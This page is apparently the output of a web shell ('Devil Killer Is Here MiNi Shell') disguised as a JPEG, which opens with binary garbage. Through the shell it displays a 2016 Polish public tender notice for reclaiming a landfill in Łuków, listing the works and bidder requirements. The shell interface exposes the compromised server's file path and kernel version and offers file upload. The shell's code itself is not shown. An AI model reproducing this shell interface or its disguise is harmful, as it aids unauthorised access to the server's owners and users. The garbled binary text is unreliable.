JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160606/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160606/69981-N-2016.html

<p class="kh_header"><b>Łuków: Wykonanie rekultywacji składowiska odpadów przy ul. Świderskiej w Łukowie</b><br>
<b>Numer ogłoszenia: 69981 - 2016; data zamieszczenia: 06.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Usług i Inżynierii Komunalnej Sp. z o.o. , ul. Partyzantów 6b, 21-400 Łuków, woj. lubelskie, tel. (025) 7982317, 7982204, faks (025) 7982204.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.puik.lukow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie rekultywacji składowiska odpadów przy ul. Świderskiej w Łukowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Wykonanie rekultywacji składowiska odpadów innych niż niebezpieczne i obojętne przy ul. Świderskiej 128 w Łukowie. Zamówienie obejmuje następujące obowiązki Wykonawcy:
1) Wykonanie robót  przygotowawczych, w tym m. innymi:
a) ustanowienie własnego kierownictwa robót i obsługi geodezyjnej, 
b) zaprowadzenie dokumentacji rekultywacji,
c) protokolarne przyjęcie terenu robót budowalnych , w tym stanu drogi wewnętrznej Zamawiającego, udostępnianej Wykonawcy do używania w okresie trwania umowy, prowadzącej od zjazdu, z granicy  drogi wojewódzkiej Łuków-Kock, do skarpy składowiska (na długości ok. 260 m),
d) organizacja zaplecza socjalnego i technicznego związanego z wykonywaniem zamówienia,
e) uzyskanie - jeżeli będzie to konieczne - właściwej decyzji administracyjnej w zakresie transportu odpadów wskazanych przez Zamawiającego na cele rekultywacji.

2) Ukształtowanie pryzmy odpadów, na które to roboty  składają się:
a)Wykarczowanie krzewów  i zarośli  na obszarze składowiska - w szczególności dotyczy to części starego składowiska (ok. 0,95 ha), z której odpady należy przemieścić na rekultywowaną pryzmę. Biomasę z karczunku Wykonawca jest zobowiązany zagospodarować na własny koszt i w swoim zakresie, przestrzegając przy tym odpowiednich przepisów o odpadach i o ochronie środowiska. Część drobniejszej i czystej biomasy pochodzącej z karczunku, po uprzednim rozdrobnieniu własnym sprzętem na zrębki, Wykonawca będzie mógł przekazać nieodpłatnie, po uzgodnieniu ilości i jakości, Zamawiającemu. 
b) przemieszczenie odpadów z części starego składowiska (ok. 0,95 ha) na rekultywowaną pryzmę. Należy usunąć wszystkie odpady - aż do gruntu rodzimego. Obszar po odpadach należy dokładnie wyrównać ziemią i zniwelować z użyciem sprzętu mechanicznego (równiarka, spychacz gąsiennicowy).  
c) rozplantowanie i zagęszczenie odpadów oraz uformowanie pryzmy składowiska  zgodnie z projektem rekultywacji.
 
3) Wykonanie warstwy wyrównawczej okrywy rekultywacyjnej, w tym przetransportowanie i zagospodarowanie odpadów wskazanych przez Zamawiającego (Zał. Nr 9 SIWZ),
4)Wykonanie warstwy odgazowującej (p. Aneks nr 1 do projektu rekultywacji - Zał.  Nr 2 do SIWZ).
5) Przebudowa instalacji odgazowania składowiska, na którą składają się:
a) sprawdzenie stanu technicznego oraz rzędnej posadowienia każdej studni odgazowującej w  odniesieniu do rzędnej geomembrany w miejscu danej studni. W razie konieczności należy w ramach zamówienia naprawić uszkodzenia studni (względnie wymienić je na nowe) oraz odpowiednio wyregulować ich posadowienie do odpowiedniej rzędnej w celu zapewnienia właściwego funkcjonowania,
b) odcięcie starych przewodów przesyłowych biogazu od poszczególnych studni z pozostawieniem tych przewodów w odpadach. Należy  ułożyć i przyłączyć nowe przewody przesyłowe  w warstwie wyrównawczej/odgazowującej. 
c) spięcie całej instalacji ze stacją spalania biogazu oraz uruchomienie stacji,
d) inwentaryzacja geodezyjna całej  instalacji odgazowania. 
6) Uszczelnienie czaszy i skarp składowiska folią PEHD gr. 1mm. 
7) Wykonanie warstwy drenażowej z maty geokompozytowej.
8) Wykonanie warstwy podglebia i warstwy glebotwórczej w tym, w ramach umówionej ryczałtowej kwoty wynagrodzenia,  przetransportowanie i zagospodarowanie odpadów wskazanych przez Zamawiającego (Zał. Nr 9 do SIWZ).  
9) Wykonanie odwodnienia czaszy składowiska (rowy i koryta opaskowe odwadniające). 
10) Wykonanie drogi wjazdowej z placem  manewrowym. 
11) Wykonanie obsiewu pryzmy składowiska mieszanką traw i roślin motylkowych,  w takim czasie i w taki sposób, aby  w dacie odbioru końcowego był uzyskany zielony  efekt pryzmy zrekultywowanego składowiska odpadów.   
12) Przywrócenie do stanu pierwotnego drogi wewnętrznej Zamawiającego (w końcowej fazie rekultywacji), wykorzystywanej  przez Wykonawcę na potrzeby realizacji zamówienia, na odcinku od bramy wjazdowej terenu składowiska do drogi wjazdowej prowadzącej na skarpę składowiska (na długości ok. 260 m) poprzez jej  naprawę w tym także podbudowy i zniszczeń asfaltu, wskutek korzystania z niej   przez  samochody  Wykonawcy i ciężki sprzęt  w okresie rekultywacji składowiska. 
13) Oczyszczenie zbiorników i uporządkowanie otoczenia pompowni odcieków ze składowiska. 
14) Uporządkowanie terenu z usunięciem odpadów wraz z odtworzeniem uszkodzonych nasadzeń oraz niwelacja z uzupełnieniem gruntu - w rejonie wykonywanych robót oraz w pasie otaczającym  zrekultywowaną pryzmę.
15)  Oczyszczenie trzech  piezometrów , odnowienie ich nadpowierzchniowych części (oczyszczenie i pomalowanie) oraz wykonanie wokół nich powierzchni utwardzonej w kształcie kwadratu o długości boku 2 m, z kostki brukowej o grubości 6 cm, zabezpieczonej obrzeżem betonowym o wysokości 20 cm.  
16) Wykonanie tablicy informacyjnej z informacjami o dofinansowaniu inwestycji ze środków NFOŚiGW zgodnie z Instrukcją oznakowania przedsięwzięć ze środków NFOŚiGW, dostępną na stronie internetowej NFOŚiGW.
17) Zabezpieczenie  i dostarczenie wszystkich niezbędnych materiałów, wyposażenia oraz sprzętu w celu wykonania rekultywacji (w tym zagospodarowanie, w ramach umówionej ryczałtowej kwoty wynagrodzenia, odpadów udostępnionych przez Zamawiającego zgodnie z Zał. Nr 9 do SIWZ.
18) Prowadzenie i dokumentowanie czynności geodezyjnych od początku rekultywacji przez cały jej proces, z wykonaniem inwentaryzacji powykonawczej przedmiotu umowy i potwierdzeniem jej przyjęcia do zasobów powiatowych włącznie.
19) Prowadzenie dziennika rekultywacji przez wyznaczonego ze strony Wykonawcy kierownika robót.
20) Zapewnienie przez Wykonawcę udostępnienia w każdym czasie terenu prowadzonych robót w celu dokonania oględzin i przeprowadzenia kontroli przez Zamawiającego oraz organy kontrolne, w tym przez Inspekcję Ochrony Środowiska, Urząd Marszałkowski w Lublinie, NFOŚiGW, WFOŚiGW.
21) Bieżące zabezpieczenie i końcowe przekazanie Zamawiającemu dokumentacji powykonawczej, a w tym: dokumentacji projektowej, materiałowej, protokołów badań, dokumentacji geodezyjnej oraz dokumentacji faktograficznej z przebiegu realizacji poszczególnych etapów  robót w sposób umożliwiający przeprowadzenie w każdym czasie jej weryfikacji.
22) Protokolarne przekazanie przedmiotu rekultywacji Zamawiającemu i uczestniczenie przy odbiorze końcowym Zamawiającego i ew. udziałem przedstawicieli organów, o których mowa w ust. 2 p. 20.
UWAGA: roboty określone w pozycjach 12, 13, 14, 15, 16 w zakresie terminu wykonania i kosztów  należy uwzględnić w poz. 4.1 Harmonogramu rzeczowo-finansowego (Zał. Nr 13).

Dla potrzeb niniejszego postępowania przetargowego i w celu przygotowania oferty przez Wykonawców, szczegółowy opis robót objętych zamówieniem, warunki ich wykonywania oraz stan istniejący instalacji odgazowania, określa dokumentacja, którą stanowią załączniki do niniejszej SIWZ, to znaczy:
1) Projekt zamienny rekultywacji składowiska odpadów innych niż niebezpieczne i obojętne w Łukowie, opracowany przez ALDAR Artur Soszyński, Warszawa sierpień 2013r. 
2) Aneks nr 1ze stycznia 2015 roku do Projektu zamiennego jw., obejmujący zmiany w zakresie technicznego sposobu ujmowania i odprowadzania gazu składowiskowego. 
Uwaga: przyjęte w Aneksie rury perforowane o110 mm należy zastąpić rurami o średnicy o 63 mm, które ma obowiązek zapewnić Wykonawca. Zapis w aneksie (strona 6) w brzmieniu: UWAGA: Ponieważ Inwestor jest w posiadaniu rur perforowanych z PE100; SDR17; o110 mm, w ilości 290 m, przyjęto wykorzystanie ich do ułożenia części projektowanych ciągów drenażowych, co pokazano na Rysunkach 4 i 4A  nie jest aktualny.
3) Aneks z dnia 30 listopada 2015 r. do Projektu zamiennego jw.,
4) Dokumentacja  pomocnicza dotycząca  istniejącej instalacji odgazowania, to znaczy:
a. Wybrane elementy zrealizowanego  Projektu odgazowania złoża odpadów na terenie Składowiska odpadów przy ul. Świderskiej w Łukowie (autor projektu: INŻYNIERIA PRO EKO Sp. z o.o. Warszawa, kwiecień 2008r.),
b. Opracowanie pt. Wykonanie inspekcji i określenie sposobu przywrócenia sprawności i zabezpieczenia działania instalacji odgazowania na składowisku odpadów w Łukowie pod  katem przyszłej rekultywacji - EKOINŻYNIERIA Ryszard Kalicki, Warszawa, luty 2014r., z zastrzeżeniem wymagań określonych w Rozdz. II ust.1 p.5 pp. b,
c. Dokumentacja techniczno-ruchowa pt. Instalacja odsysania i utylizacji biogazu wysypiskowego - Instytut Energetyki, Oddział Techniki Cieplnej ITC w Łodzi,
d. Opracowanie pt. Przegląd okresowy z inspekcją stanu technicznego i funkcjonalnego stacji kontenerowej odsysania i utylizacji biogazu wysypiskowego - Instytut Energetyki - Instytut Badawczy, Oddział ITC w Łodzi, grudzień 2013r.
5) Specyfikacja techniczna wykonania i odbioru robót.
6) Przedmiar robót rekultywacyjnych Zamawiającego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.23.20-4, 45.22.21.10-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 100 000 zł (słownie: sto tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Udział w postępowaniu mogą brać Wykonawcy, którzy spełniają warunki określone w Art.22 ust.1 Ustawy oraz nie podlegają wykluczeniu z postępowania na podstawie Art.24 Ustawy z dnia 29 stycznia 2004r. prawo zamówień publicznych  (Dz.U.2015.2164 j.t. z późniejszymi zmianami) oraz spełniają warunki i wymagania określone w SIWZ.       
Dokonywanie oceny  spełniania tych warunków w celu zweryfikowania zdolności Wykonawców do należytego wykonania zamówienia odbędzie się na podstawie oświadczeń i dokumentów wymaganych w SIWZ złożonych wraz z ofertą oraz - w razie konieczności - na podstawie dodatkowych wyjaśnień  składanych przez Wykonawców na żądanie Zamawiającego po otwarciu ofert. W celu potwierdzenia prawdziwości informacji zawartych w złożonych oświadczeniach lub dokumentach, Zamawiający zastrzega sobie prawo prowadzenia ich weryfikacji w oparciu o dostępne źródła.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Udział w postępowaniu mogą brać Wykonawcy, którzy spełniają warunki określone w Art.22 ust.1 Ustawy oraz nie podlegają wykluczeniu z postępowania na podstawie Art.24 Ustawy z dnia 29 stycznia 2004r. prawo zamówień publicznych  (Dz.U.2015.2164 j.t. z późniejszymi zmianami) oraz spełniają warunki i wymagania określone w SIWZ.
Dokonywanie oceny  spełniania tych warunków w celu zweryfikowania zdolności Wykonawców do należytego wykonania zamówienia odbędzie się na podstawie oświadczeń i dokumentów wymaganych w SIWZ złożonych wraz z ofertą oraz - w razie konieczności - na podstawie dodatkowych wyjaśnień  składanych przez Wykonawców na żądanie Zamawiającego po otwarciu ofert. W celu potwierdzenia prawdziwości informacji zawartych w złożonych oświadczeniach lub dokumentach, Zamawiający zastrzega sobie prawo prowadzenia ich weryfikacji w oparciu o dostępne źródła.

Wykonawca przedkłada wykaz  robót budowlanych/rekultywacyjnych wykonanych przez Wykonawcę w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów (referencji) dotyczących tych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (wzór - Zał. nr 16 do SIWZ). 
Wymaga się, aby wykaz potwierdzał wykonanie co najmniej dwóch zadań , z których każde obejmowało rekultywację składowiska odpadów o powierzchni nie mniejszej niż 2 ha i o wartości nie mniejszej niż 1 mln zł każde.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Udział w postępowaniu mogą brać Wykonawcy, którzy spełniają warunki określone w Art.22 ust.1 Ustawy oraz nie podlegają wykluczeniu z postępowania na podstawie Art.24 Ustawy z dnia 29 stycznia 2004r. prawo zamówień publicznych  (Dz.U.2015.2164 j.t. z późniejszymi zmianami) oraz spełniają warunki i wymagania określone w SIWZ.
Dokonywanie oceny  spełniania tych warunków w celu zweryfikowania zdolności Wykonawców do należytego wykonania zamówienia odbędzie się na podstawie oświadczeń i dokumentów wymaganych w SIWZ złożonych wraz z ofertą oraz - w razie konieczności - na podstawie dodatkowych wyjaśnień  składanych przez Wykonawców na żądanie Zamawiającego po otwarciu ofert. W celu potwierdzenia prawdziwości informacji zawartych w złożonych oświadczeniach lub dokumentach, Zamawiający zastrzega sobie prawo prowadzenia ich weryfikacji w oparciu o dostępne źródła.

Wykonawca przedkłada wykaz urządzeń  i sprzętu  dostępnych Wykonawcy w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami (wzór - Zał. nr 17 do SIWZ). 
Wymaga się, aby Wykonawca wykazał dostępność co najmniej:
- samobieżnej koparko-ładowarki przedsiębiernej z zestawem łyżek (do wybierania odpadów, do wyrywania korzeni itp.) - 1 szt.
- Spycharki gąsiennicowej o mocy min. 150 KM - 1 szt.
- Samochodu samowyładowczego - 3 szt.
- Kompaktora do odpadów o masie min. 23 Mg - 1 szt.
- Ciągnika z kultywatorem , broną i siewnikiem - 1 kpl,
- Kruszarki do betonu o mocy i o wydajności zapewniającej odpowiednie rozdrobnienie odpadów przekazanych przez Zamawiającego - 1szt.
- Urządzenia do mieszania odpadów - popiołu z osadami ściekowymi (np. wydajnej betoniarki poziomej) - 1 kpl,
- Zgrzewarki do łączenia folii PEHD min.1mm - 1 szt.
- Zgrzewarki do rur PE - 1 szt.
- Sprzętu do transportu i do załadunku komunalnych osadów ściekowych (patrz Zał. Nr 9a do SIWZ).
- Rębaka do rozdrabniania drewna i gałęzi.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Udział w postępowaniu mogą brać Wykonawcy, którzy spełniają warunki określone w Art.22 ust.1 Ustawy oraz nie podlegają wykluczeniu z postępowania na podstawie Art.24 Ustawy z dnia 29 stycznia 2004r. prawo zamówień publicznych  (Dz.U.2015.2164 j.t. z późniejszymi zmianami) oraz spełniają warunki i wymagania określone w SIWZ.       
Dokonywanie oceny  spełniania tych warunków w celu zweryfikowania zdolności Wykonawców do należytego wykonania zamówienia odbędzie się na podstawie oświadczeń i dokumentów wymaganych w SIWZ złożonych wraz z ofertą oraz - w razie konieczności - na podstawie dodatkowych wyjaśnień  składanych przez Wykonawców na żądanie Zamawiającego po otwarciu ofert. W celu potwierdzenia prawdziwości informacji zawartych w złożonych oświadczeniach lub dokumentach, Zamawiający zastrzega sobie prawo prowadzenia ich weryfikacji w oparciu o dostępne źródła.

Wykonawca przedkłada wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za wykonywanie i kierowanie robotami rekultywacyjnymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia - niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności (wzór - Zał. nr 18 do SIWZ). 
Wymaga się, aby wykaz obejmował co najmniej:
- osobę kierownika rekultywacji posiadającego uprawnienia budowlane do wykonywania samodzielnych funkcji w budownictwie w specjalności konstrukcyjno-budowlanej. Wymaga się, aby osoba wskazana jako kierownik budowy, posiadała odpowiednie doświadczenie w prowadzeniu rekultywacji składowiska wraz z instalacją odgazowania - należy dołączyć odpowiednie referencje lub oświadczenie wskazujące adres przeprowadzonej rekultywacji, wielkość i rodzaj składowiska odpadów - wskazanie co najmniej jednej rekultywacji składowiska o pow. min. 2 ha.
- osobę kierownika robót posiadającego uprawnienia budowlane do wykonywania samodzielnych funkcji w budownictwie w specjalności instalacyjnej - w zakresie sieci, instalacji i urządzeń sanitarnych, w tym gazowych i wentylacyjnych,
- osobę geodety posiadającego odpowiednie uprawnienia zawodowe do prowadzenia i wykonywania czynności pomiarowych i ewidencyjnych związanych z obsługą geodezyjną zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Udział w postępowaniu mogą brać Wykonawcy, którzy spełniają warunki określone w Art.22 ust.1 Ustawy oraz nie podlegają wykluczeniu z postępowania na podstawie Art.24 Ustawy z dnia 29 stycznia 2004r. prawo zamówień publicznych  (Dz.U.2015.2164 j.t. z późniejszymi zmianami) oraz spełniają warunki i wymagania określone w SIWZ.       
Dokonywanie oceny  spełniania tych warunków w celu zweryfikowania zdolności Wykonawców do należytego wykonania zamówienia odbędzie się na podstawie oświadczeń i dokumentów wymaganych w SIWZ złożonych wraz z ofertą oraz - w razie konieczności - na podstawie dodatkowych wyjaśnień  składanych przez Wykonawców na żądanie Zamawiającego po otwarciu ofert. W celu potwierdzenia prawdziwości informacji zawartych w złożonych oświadczeniach lub dokumentach, Zamawiający zastrzega sobie prawo prowadzenia ich weryfikacji w oparciu o dostępne źródła.

Wykonawca przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
Wymaga się, aby Wykonawca wykazał posiadanie środków lub zdolności kredytowej w wysokości nie mniejszej niż 5 mln zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

